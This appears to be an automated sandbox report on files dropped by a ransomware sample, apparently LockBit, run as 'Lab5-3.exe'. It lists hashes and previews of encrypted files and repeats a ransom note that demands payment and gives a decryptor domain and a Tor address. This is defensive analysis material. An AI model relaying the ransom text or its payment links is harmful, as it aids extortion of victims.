                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6400
                                                                                                          Entropy (8bit):7.969830941598184
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:sYgOtIZ6tLvXGHZI9c8PrAsprW39lrEj5HoPLyFXy1Qff7Wv1ezkiGx0uKeY2Elk:s5U13PrBEfWJoPamQfqvAgB0Cb
                                                                                                          MD5:1D1FA5B4ADF86028B095C690D71EBC92
                                                                                                          SHA1:6B1C57C6D95EA7E01DA4A73FECEE3360A6B60CED
                                                                                                          SHA-256:C354BCE8BE622A03BF06C81128B97D473226834D2946ECE09FCA49F7AD958972
                                                                                                          SHA-512:018FC78F724EE0F0E8F58784750B096A755D8FD7DB4F8A82A9628AC792DACD0B545B695C3659304F86A73C3E207CB10C52C86F72B44AEC53C152E06FE7ADB152
                                                                                                          Malicious:false
                                                                                                          Preview:.o.m|c...=......wQ...%.E..p.8..eX.F._V...8.....n$.b.)JK..\i.v=.G..cnJ..t.c......zb..5.k...b.g...o..C.y...k.7i..3...H..c..+w...S\.S..*L.f:C'%...G../P..>Mt:.q....>.z......S.".R...........z..X.wjO..@...:o.>..@!....C..b....%./...G....drS--......./J;*..#..$k..;.|2....T.tfX...*.0#.X..iW...o..`...I..).b....H.e'p.p.s.l..q.?rs..:.....i.a.h..:.Z.L.......m.?F...,..Tgg...H....+....9).@.........A&f.......Z(...r.....J..x.....Sw.k&Y.}.;..j4t.\.=f7..B\@.........K|!..L$.#....%@..95..J...!.I.#"...m|L.~..d./.....5.q.=....}O..3W..*..k.U..v......N.B...(.........^|-.yA..N.h..X77Q..1\.Cp.0..DAN.c[W...J......2.kTC.....Y.W~.#.w.]l...........I7..E*y........_.4....1a......#...V...}.).......J..:|D^.7.Q^..DQ4.j9.Mx`F.......9Vk3...!...p..V..Je..7L....I..O.f...\...[e.b!.;.Z%.-.wV..1:....aK.....r......z(...5.X.W>0....\........A.<....MI{...[..a.t.XB..DW.`+.%-...Z.......j.C<t.....;..j...R4.K...._...<.2.s......~.4.....Fn....0.0..$.a.@.....].6. @h..if.-!}2.jN.!.wU`....u".Xg
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6416
                                                                                                          Entropy (8bit):7.973923041179309
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:babYWrOGrcZ7PU7/AyheWT+wAE2UN/d0asGezqHZCxKXJwlhhnxGx0uKeY2ElUJ:bpWrOGd7R/2HG7HZV5anK0Cb
                                                                                                          MD5:A9163627FB600BE14943CEBA562E0A25
                                                                                                          SHA1:FDF01BE4CA6A6B4105358BA27A39ADC335587BE4
                                                                                                          SHA-256:9DE5FDFA3509DF2BA7486BACE5A46DF1A628F87DDE3CC7AC8E9291F53E58827B
                                                                                                          SHA-512:D7174C13FACE7F1A6A81EB2BFDFEE05489E7B2D65964599A31D60D300B00EBBB66789886D3B43AC461FB922DA8CABA08ECCF5623607A3A990AA5438742C9A32C
                                                                                                          Malicious:false
                                                                                                          Preview:.c...4.{.q..?.F.Xs-..q.@.@..m....+&.9d]i...]..9J..m3?.f.2........:....m.Ky..9X'........v.#>.m.]i.1..R=Ap..}.........^....u.....a..X...\..;....>...>.'..YM.,(A.."M..tP.t.|.....H..G.'................$.>b.....4..."...U....X.;..0...u..y.+6Kw...A...|.%.......z.].._.mw.4ISL....=.$m.r.[.....%.O..;.-..)C@.b.*....h0!.].U3...)..........mB[.....w.^.5y.ARGX..|Uj..~..P:e...&.C.R.m.!..A......$.Un1......9L....U..=B../Ja.8..t.C.'j.8....!.\[Wy....r.Cd ..iO.F .....(..$..pb..9%...|..j...[=..3La...{.a#....1.W...&..H.B5..z.......N..<\.q..e.Uh.(7.:1.up.F?..<..M)a...i..a."d.f.kc.._..|I.B...........C.la.o]m....}.5..$A8.".BV.P....).h:k..=....BW+>..4..s7.vV8a..^.#. c?.6..)s'.fS..I..q.o.....cRK....(...'....e..J.~.Dt.t...T...y..p...I.....}I.>i.?[0fS.J....$...V.^O.3......@......C.}...~..~`e..vX.x........"...]s..{[....kN8.&e.z.`...w.iS=.n.M..iT...[..6>.a7[.6h...U.E.jH.Y.O.2...W.yT..E.)...}..%O...."..".........M...|..m..Z.8.L.U?..Q..2F....0%..&]$.{H...^..(U...4..JO=[.y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.923807180604784
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:alI34+qv9eBOhImABA58Va5EXvyVwHHfUTid3hBaUoSGFcmeykEdEElU92i:eIhqvYOGSeVa5jVtGx0uKeY2ElUJ
                                                                                                          MD5:436F49158AC5F7FEEC2B76A620508A10
                                                                                                          SHA1:5B991CE1AB4AFE13443B2E374972517A58519235
                                                                                                          SHA-256:97068807A6DFB14E68F7B199792E076708A72C665252B9432E1E50972B484451
                                                                                                          SHA-512:36363E40724852DAE22E882A21A000343C2FF3DEEA82699B33C53CA779C40CC0B5A8996FAC51F7F3CE5922A9542141A6BDC29C8151E99B2CBC18F08995C9BF3F
                                                                                                          Malicious:false
                                                                                                          Preview:.6..W...e..HP..H......@.a..A+..w........x.f.,.l(.}...G.y...,...jN...4f...c0........2...H.|..5[U$....Y....;..-....2..:=...3.H.k;.Y.8qa..7...v..wcq.VN.{...t.1.t./lK.l.... ...!,...3.C.;..].|QAX..A....9...L.......C.6.......N.R...c%.z...6=..s.85....tFpR ......5..<$..*...u.#u!....d..1...&.......hs .:[.a.......u.....^.H..|u*B......)".3....|.zN2....?c..:F.N.......;ws.....[.@.....?.......(.FQ/.,...^....D..%.?4..Y..7..azX...9..)]...b...NN.CB..*..."....u0..rK7.6.`.......j.m...M.m.va....'."....[.D..L...e....%....x.j....*O?W..Hz....+.........x.8.0M.??.@I..~.e..._....4..Di.l.....>.$.9..CT.....}e....M.[Z...s....zf... B..$..x!l.i.<>......5.....)...#.E...@..m..D+..d.a.@.N.....xo....t.,.b..*c.J@M...T.&...si...H.'l..J...M...~."U.1../.f8.{.L..K.I.8...V..}Q.......0...A.rf#D;.D....*hp6...I..%x....~6M...Py......Pn8..E.iBl.]k....A. .p.....&...f..r^"...=...*".Y..LK~Xo]n>f..T.TEsK+.U.......&....M.%..MG.O."....Jv_.[......,.V?.].....=o.[.a......K..%(/-.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6096
                                                                                                          Entropy (8bit):7.968736278178045
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:90jtIS/SEetmBpzWK3ptAVTtMg3uSPimgr38XAqVis2UYIR7tu9UrVYqscGx0uKk:98LSEeQBp6EAVhz+6k0AIz2ULtu9YVYz
                                                                                                          MD5:7F8892304A1A481C6AEFC7C2FA638BDF
                                                                                                          SHA1:E0EAF95BF13C5E2BDC96A370AA07E9B6612D4A79
                                                                                                          SHA-256:1441CDDDE744A27E0BEC42AA9494F43985933A36A9D2378558AD8BDA58FED043
                                                                                                          SHA-512:84E31CA5AD35294239291377738BD873DC844276662729E60B7E62E1A02FFE3DF9AFD7A5F320347F16FF2603C49744C376814BBDF4EC91A4596443F2C9598535
                                                                                                          Malicious:false
                                                                                                          Preview:.c....i.E$Z.Q#.....W5.Zi.k..l.}.$.rj;..5}N.......;l....s...8X.i.H........A...23..*-.'$.j~...a.(Qg..$.U....h&.r...>......^............[.h....t9.54.[e.W.`...o.....%..... %..H+...N..&N..'a.lB......._.JU..]6.._>$g.tWlz"..O.~<.b.W'.?B...<..^4.Y..vF#[...d$dsow=...ez.F..Zm...d#5....E.1...4|KR.W$.._`...m....p..{m....g.s`7...st..... .n.#z.)..j../...0%P...A.o.[..S.6.p..Fim...hb...O..........M.w.rx.......n.\]Q....y5..".....`..s...$O',.4Q.=F..'D....$~..\.j.{B..]G.f.m.......%..oF.5.i..(...w.f.....5[.,.k7...r....Z0.u.7 ...U.... .5}.AjEW.M..s6Y..]i[?@.Yd.......AH.E.....z.Q.GS...3..h..x..4G{_qQ6&.*..5t..`.ssn...yf.f.?..'.8lX.56......^..........`7..cF..&.a.0...bB............g..B\.E...d...!.Y...2K.Ha..Y..w.CU..7.....Q...,<.l.j.s)uO<_..m...#F..m%...g..Y.......W..9..?q.G..(.1m.p^.;......Xi..c...u.i$....q...~r].........z.pOfL.)...C;..t.7.4.`>..p....P.hl..,h..m:'.....)8....w........r.RRJ..O."!...+..G.l...~a(...!.._.."..g.~.A6.B>..Ev.;.Kb..b,.#..5~r~....j.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6896
                                                                                                          Entropy (8bit):7.972375908133246
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:+Bg0+wIMPaNzhdMidWCFAyib3iTn0Yhfdp0Cb:q3PGuC65byzfJztb
                                                                                                          MD5:C3A49BF84345C5FE90B527917D98BA4B
                                                                                                          SHA1:D4FCDE9AC4C4D3A7A182AF3D990A09D2CBE5459F
                                                                                                          SHA-256:B7C6E5946B4910BAE299EE8D25EE3FD519F35B5DD7E587D8BEB7E781602728A4
                                                                                                          SHA-512:0C4CE4DB1C259E6AD355C517234CB7048F20EA50B1CBEEDFB69C14B9D4F19A4370060B62906EC969E9CA062A6BD9331EE4B9600A7BAB1663079227F0C88EAF36
                                                                                                          Malicious:false
                                                                                                          Preview:.".<....B#..z..}...X.s...#...5..7KIX-...|D......z...(+..@..."i.y.A0..V?q.e..H.R.9.xg.b..q.P....T....n......G[.;>...UM.p:U.z...._..?......Ie.f..pgL.s5.' .@....RN.W..*:...>....mg.2.6.....u|......Z.HL.TN...............tu7..g..vd.x.O^z......X..)1x....C}.....uJ,}.H.........o..k.f.q.'........Wq.iu.pZ....."m.\s..dqj..q....Pk..W....^...@...)@Cp..[ZK...(..<.$....`.0....j-v9.....,....C{.,..J.9..5>j..uJo._.:..g,TcZ..!.H.I....f.-N.e......Y.m..8.{..+u....Ez...Q-T....Z0S.N.f3.$.8[e.N..V.~..o....TLD..K....k...&..QJ?..H..(R.c.A...{..!....E.U.. .y..O0c....+.&/..0..=]u...G...e.M..7.\(...S.$.R.,..{h...@..b..#.......,.mu...*y[.....Avm0.?@*."R2Oj.b...@.87u........*..m.S.;...e.......D..O..e...@. g.*t16....v..:>.F...KYMuIC%.$kz...-g.m....|gk....Y.1.lD....Bi........h^.".<_IM;.v..T".. .uUV.Z..=Y:7.S..||.*..M.IgkRD`.!H..A.8.........\c.e.......x.{..N#xW.....[b..8..v.uO.e~...0.;......@.........L.mKk..2.lR..'Z........t..f..cH..5a.Tr....J.....j.R:..>.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.94032659212325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:vpBuyzLG5i0RjyyF9Kr4T+vWFrplHfUTid3hBaUoSGFcmeykEdEElU92i:vF4isj5VRp+Gx0uKeY2ElUJ
                                                                                                          MD5:1C07A3D494AD0ED7CB41FF0331B2A02C
                                                                                                          SHA1:928C96EE9037850F15382F6D22A6837E5769EAF6
                                                                                                          SHA-256:9BCECB2795FBFF4A5CB6AE4D8A53D01A9C639C5D9B602074AA8B571313EBE740
                                                                                                          SHA-512:FECA92C4CA448483D5EB7137D78DAFA65B602B9A03CB1B912FF6352C2AAB73F9239AB1161D05231B18202504C0E7715BEBAC7B5B3213251653D6E643E8BC78F9
                                                                                                          Malicious:false
                                                                                                          Preview:.S;@..._..'..'.|I.Qj...3p.....}<..\.,.\.....bXa..?Qpy...-.d..Mf...e..e...........['..i....RC.7/..t.T.k....N>........bX.[fj..<qW.6t...`..F.~.e..)o..N.8!.R...0e\........YA..m.P...u.......{].).vOw^.C."....4......[$...4....w....8....@..d.W5.....%.......B....../.|....\...Dp-..a...u...\4..]..z.....k.y.........q..)p./.2Yo..X3Y....X..}(V....Ah..W"..t..[.... ......p..{..P.:.q!c.!O..'..F...d..7..O.._,..].m...|b.e...du>P.k..f<.3.c..s.#.G... VMnF.;.2~...i..vR...=&..@...i....m.Sr........U...C}.-..l..n%.?.2..&(.,P.P.\._.Q.N...`..n.....Q>..../k.K6.6...n.#93...2Gm...{R..qx....z".\..K..B(..GE.....Wm....|.y..5........2%..(k.".*."G;G..Y._.......E4..T...F.....D.0.[Qq.JM7c?byB..tm.|..C.....}...,...GN_._Z.4.V..w_0.....s"2..5....|...#...Mbo..C.._%...'q|t w...R.&{...Am..9K.....4.....V....%...y..$u.............GIX.N.....X.7..n..3...H8.....q:.O..^u'...pk(.....svqr.<.}tKg..@.......8..B.MyKL.J...!....N.c.5#......;.@.Y.co...rYSO....{.[.ao.Q.#...${..2h....G+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8256
                                                                                                          Entropy (8bit):7.9751179555339275
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:+boDnDc8kZi1lB4HjG6PAruK92TjNWiJtXlXSFh1uxcEI4q1NWOT0Cb:AWc8ksl2HSrF969tXlQhlR4q7WOTtb
                                                                                                          MD5:1F6D8DB94981D77DC729763DAAB16CB7
                                                                                                          SHA1:45C892D14AD09E668C78553B76BEBA76ECCE2976
                                                                                                          SHA-256:D6F012F4D4C69E1D5DE75EA6D066F995C74C10C58FECC2A163C59C4A36DD2DE7
                                                                                                          SHA-512:6C589E9542D3E30D00B3679F88E0E7AE34A1E178D5FA739B1CECBF333609FCABFE66A503870D21656EB6A7DB8B7AF3C6D535C3A551D8F424A5C25F4F38214A3B
                                                                                                          Malicious:false
                                                                                                          Preview:...m..E.(A..w[O..S.sG.....D/q....7..L.". ...C.......Cw9..d..<.Ce.,..t.O.W8....4-.|....0.+R.0..._\.......n@r.KdX.@Z...*......R@Yj.......VmI.................Uzp^'<.w./|..m.:.....n.....,k...R..t)...D.:.....I..._..A.F.._...%....e..~..bE'"e.......I.^..(..`.w...Z.............d......4.XL..Fu..7.a..g..6^.6....sj....#....H....1E..C9o.j..<d.y...#.......N+M....5"......6..9.~.....H.F^.5v.4..=..E_.,/.u...Y..q.|.:a.<.!.[........s........9*.p....!'$.[U.n..A...B..}.v....e..zP!..A)...I.+._g.zn..V..v.L.6.b.#...z.cj..4\...4nO?..m.},..5..h...M..^...I.q._.O........n....z..<..R.u..xI.R:..1.S.....Tb...ZwY.?.k..k|d63U]..H..i..h!...1.H......0.W"#9..ws.......yy.j...].n.4[Y0.......v...`~J..no2s....#.%..%p.B.}@2.(........L....^$./(.;....L.?4..P..r.'`M.c..8.1v.O....y.JB..N.......d..zz.......r..S?....@.Yz..6z..5&}......'x.}....c..H..da....1.Sy&.......%......F\le!.a,...$$.)..Ap..M....~....b...bW......n....@.2..0:j...\...q........@.]4.b..Rr.Y....g."...2..+|...d...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5936
                                                                                                          Entropy (8bit):7.969596592394418
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:lc9v6Q/25FaoH4DM1CwEdnGIfaH83zplWkkDlZ9UTgSr1uT5CdGx0uKeY2ElUJ:kp/259vkBdG23zplAD6ESr1uFCm0Cb
                                                                                                          MD5:1822FB9420A3DDFAFBD7A54DC542995B
                                                                                                          SHA1:FC31D6372E849EFDB77C8CD729657BAB974ED828
                                                                                                          SHA-256:0B9B3DA8DE3419EBBFEA7468899A8F6CE7BBD324CA25851FB271659764B09764
                                                                                                          SHA-512:7FC3DBF4995C799ECD5DF5A3441FF450B722CF80C5499B5AFEA4A6EC448BCB14A3894893F79325679EE027D13D0D860AB22C629D61B8006919BCEC1E2CDC108C
                                                                                                          Malicious:false
                                                                                                          Preview:8.q.3=b.m..A.t..h..^.w.0.....*k....h...\...YDx.."dw._.C..1.T4..~..M..f.#.@%.......>TS.[G..f......9....3..b.3...4.l..%.v..fS.+,.9.,.<.O.x....\A5O.4]..^...jNKM..h2."hF.Z.RK.?..]._.&..W/...-./..0.G....0.......2F.pk..m...........s.{.]...qz..........[.&f.W..*w..G6'.....G+-...L.B|...f.r`.T.g....B..\8@..........9...f......+i/.}V..@3....MH....w../STD....4........b..8.*.h.....A..k.?....G....5...Q.u.>#.......O..Dr.W .KXa(..{n.....&.......9..B2.WT....:;g2..[;.w.e...]BC.j'-k!L.\.4.....A..3:...Q...-.G=.K...?....%..#lDL=.1q....>..h.AKm5Z....o.........6..*.0.&}...Y.O.(.G....\...v..o....2.....)?o..N..&.v...D.D.s....D.LA.s.z...k.k.Z&..pe....A.fY........+c9.w...S....AN0.w.{..rX6..o+X<).....J......p....<t.y../.i..m[..B.i\..L=,.....eH.R.]..k....uA. ..1.......:Rv....}..Pol......3..G1...8..4.......D.jH*.].2Bd.........e.!.;.c.b).j%.#.:...Ug.:Q.@~z.i../,.'...H_........a.6..M.>.8..<,.p.d..9.x..9T.2...{...=Y..%e..l.b.R...1{.....l.&C.....:$.T\....f.\..M...9.>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
